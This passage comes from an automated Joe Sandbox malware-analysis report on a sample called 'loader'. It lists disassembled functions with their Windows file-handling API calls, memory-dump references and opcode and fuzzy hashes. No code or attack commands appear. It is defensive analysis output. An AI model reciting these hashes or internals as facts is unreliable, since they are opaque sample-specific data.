                                                                                    • Instruction Fuzzy Hash: FC4197719447589EDB20DBA0CC55AEAB7BAAF00304F4404EEF18AA7193EB755FC5CB90
                                                                                    Function 006398E0 Relevance: 1.6, APIs: 1, Instructions: 111fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?), ref: 0063995F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 9be38a8bc598eac2283275eaad26ef83684eb85f3c5a0e8b643a9749f8724058
                                                                                    • Instruction ID: 4c54e8c8a22855ddcd3a7e7510aab404b97768b8a2a0e531c4a67ddecb1af83b
                                                                                    • Opcode Fuzzy Hash: 9be38a8bc598eac2283275eaad26ef83684eb85f3c5a0e8b643a9749f8724058
                                                                                    • Instruction Fuzzy Hash: 673102309443456FE7209F24CC86BDABB96BB04320F140B1DF9A1962D0D7F4A948CFE5
                                                                                    Function 00639F7A Relevance: 1.6, APIs: 1, Instructions: 111fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000001,?,?,?,?,0063D343,00000001,?,?,?), ref: 0063A011
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    • Opcode ID: bb05d627ec96265d77453a747f9edce67a488d3facc693ee0fdf6f12a2ee456d
                                                                                    • Instruction ID: ab6912020ee8a88da56bcce84b7fcf57033c7f87319c6a2d5f1aed8393cb9aa6
                                                                                    • Opcode Fuzzy Hash: bb05d627ec96265d77453a747f9edce67a488d3facc693ee0fdf6f12a2ee456d
                                                                                    • Instruction Fuzzy Hash: 8B318F31208355AFDB18CF24D818BAAB7A7EF94715F04451DF9819B390CBB5AD48CBE2
                                                                                    Function 006313DC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 006313E1
                                                                                      • Part of subcall function 00635E37: __EH_prolog.LIBCMT ref: 00635E3C
                                                                                      • Part of subcall function 0063CE40: __EH_prolog.LIBCMT ref: 0063CE45
                                                                                      • Part of subcall function 0063B505: __EH_prolog.LIBCMT ref: 0063B50A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: bf5c9e0afbce8b49889361044820c38a62340ca8ab78620a14af735ef233892b
                                                                                    • Instruction ID: cecac6bcce1530451e5ee174edc8853d51a9c79dcde8b48db62df267e08f2f07
                                                                                    • Opcode Fuzzy Hash: bf5c9e0afbce8b49889361044820c38a62340ca8ab78620a14af735ef233892b
                                                                                    • Instruction Fuzzy Hash: 86419CB0905B409EE764CF398885AE6FBE6BF19310F40492ED5FF87282C7322644CB54
                                                                                    Function 04FF66F2 Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlExitUserProcess.NTDLL(?,77E8F3B0,000000FF), ref: 04FF66FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2189140272.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4ff0000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitProcessUser
                                                                                    • String ID:
                                                                                    • API String ID: 3902816426-0
                                                                                    • Opcode ID: a21f459eca23095298578a296e7741b1a3f6a614481b117f0abf2ed8d52fcc33
                                                                                    • Instruction ID: e8e8ebfc6a81059480712fca990e4888a962e60b22b66d3dd2555cb53817a352
                                                                                    • Opcode Fuzzy Hash: a21f459eca23095298578a296e7741b1a3f6a614481b117f0abf2ed8d52fcc33
                                                                                    • Instruction Fuzzy Hash: 7A310AB2D1060CAFDB01CFD5C949BDEBBB9FB14336F21461AE521A6190D7785A098F60
                                                                                    Function 0064B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0064B098
                                                                                      • Part of subcall function 006313DC: __EH_prolog.LIBCMT ref: 006313E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 273a76851dc0ad3e7df94caa7556aed50512bf04afc413ee91f4a1cb4e9e518a
                                                                                    • Instruction ID: 41be3f405a026abdb2f7a2f006148ae1917cdca8193693642914e3b8fc4b0775
                                                                                    • Opcode Fuzzy Hash: 273a76851dc0ad3e7df94caa7556aed50512bf04afc413ee91f4a1cb4e9e518a
                                                                                    • Instruction Fuzzy Hash: EB318D71C00249DFDF15DFA8C9519EEBBB6AF09304F10449EE409B7242D735AE04CBA5
                                                                                    Function 00639DA2 Relevance: 1.6, APIs: 1, Instructions: 83timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00639E70
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileTime
                                                                                    • String ID:
                                                                                    • API String ID: 1425588814-0
                                                                                    • Opcode ID: 3b48d4a14e57ebf59311d0476aa07977eecd69c29351a85172149493f311c0d0
                                                                                    • Instruction ID: 030ab16d6cad6122e986abf4c09ad9a3130ffd3ec263c584811d5162a37457d1
                                                                                    • Opcode Fuzzy Hash: 3b48d4a14e57ebf59311d0476aa07977eecd69c29351a85172149493f311c0d0
                                                                                    • Instruction Fuzzy Hash: 7321F031248686ABC714DF74C892AABBBE6AF56304F08481CF4C5C7241D3A8E90C8FA1
                                                                                    Function 0063966E Relevance: 1.6, APIs: 1, Instructions: 82fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00639F27,?,?,0063771A), ref: 006396E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: b76d5bf46ad1a90cd8a36084b82259bb78371cc5ce56831ab462a344ca648967
                                                                                    • Instruction ID: 706278d0c7f333081b1c1718f4866777d63564fa084f263a692b254e1c209196
                                                                                    • Opcode Fuzzy Hash: b76d5bf46ad1a90cd8a36084b82259bb78371cc5ce56831ab462a344ca648967
                                                                                    • Instruction Fuzzy Hash: 3021C4715043446FF3708A65CD8ABE777DDEB4A320F100A19FA96C22D1C7B4A8448AB1
                                                                                    Function 00639785 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(?,?,00000000,?,00000000,-00000858,?,-00000858,00000000,00639C22,?,?,00000000,00000800,?), ref: 006397AD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: a3bd1bc98810bb5d74c0de55c844f1984626b45fefd556c24bcc118d38132323
                                                                                    • Instruction ID: d9bea633e21780c7074c49bdc3f5d1bedea5c814072dbd4a777dcf4c95c738d3
                                                                                    • Opcode Fuzzy Hash: a3bd1bc98810bb5d74c0de55c844f1984626b45fefd556c24bcc118d38132323
                                                                                    • Instruction Fuzzy Hash: E7113C31914614EBDF205F65C804AAA37BBFB92361F108929E42685390D7F49E459FF1
                                                                                    Function 00639E80 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00639EC7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    • Opcode ID: 7603ef04ee22404561c0e20b0fe365835ce19a310a8fa79e58c2cba1e37df999
                                                                                    • Instruction ID: 0c38dfbc7f73f1ada8e41f4cd7cd11a9957fe5dc6d7140d38be8c16935c349a8
                                                                                    • Opcode Fuzzy Hash: 7603ef04ee22404561c0e20b0fe365835ce19a310a8fa79e58c2cba1e37df999
                                                                                    • Instruction Fuzzy Hash: 5A118231600710ABD724CA68C845BA6B7EAAF45360F504A29E553D27D0D7F0ED49CBB0
                                                                                    Function 0063A2B2 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0063C27E: _wcslen.LIBCMT ref: 0063C284
                                                                                    • CreateDirectoryW.KERNELBASE(00000001,00000000,00000001,?,?,0063A175,?,00000001,00000000,?,?), ref: 0063A2D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2011010700-0
                                                                                    • Opcode ID: ddf6060514b4ef6eaf84c052379667353bc47010ecda74082cc262472b5a07c7
                                                                                    • Instruction ID: c01d19bd58079e8418fe813b380866615f65b2e529ce685a592b9b110c678697
                                                                                    • Opcode Fuzzy Hash: ddf6060514b4ef6eaf84c052379667353bc47010ecda74082cc262472b5a07c7
                                                                                    • Instruction Fuzzy Hash: 2601D8315002206AFF21AFF58C49FFE334AAF09780F044418F981E6281DB54CB81E6F6
                                                                                    Function 00639215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 0381a9818bd6f7da34eb563a7f3e550390d768328f4dce52ef5f40e1d7b59bf3
                                                                                    • Instruction ID: 0547cf428af2a546c74255cfa806673961372a19d221135e47c5161d41236b25
                                                                                    • Opcode Fuzzy Hash: 0381a9818bd6f7da34eb563a7f3e550390d768328f4dce52ef5f40e1d7b59bf3
                                                                                    • Instruction Fuzzy Hash: A701A573910928ABCF11ABA8CC819DFB773BF88750F014119E812BB212DA748E04CAF4
                                                                                    Function 00658E54 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 220839149369c8cfd4168b61c2d3adc7fb742a74cdec9b001d59c2af6fcaf4ef
                                                                                    • Instruction ID: 28b00c87ac176b5ba5b7b8c963dbfbf6bc4b5d16e43e7b16db12fdf957d9ab53
                                                                                    • Opcode Fuzzy Hash: 220839149369c8cfd4168b61c2d3adc7fb742a74cdec9b001d59c2af6fcaf4ef
                                                                                    • Instruction Fuzzy Hash: 0CF068326011156EDB212A256C06BAF377B8F81B73F144119FD14B7A91DF609D0985A4
                                                                                    Function 00635ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00635AC2
                                                                                      • Part of subcall function 0063B505: __EH_prolog.LIBCMT ref: 0063B50A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
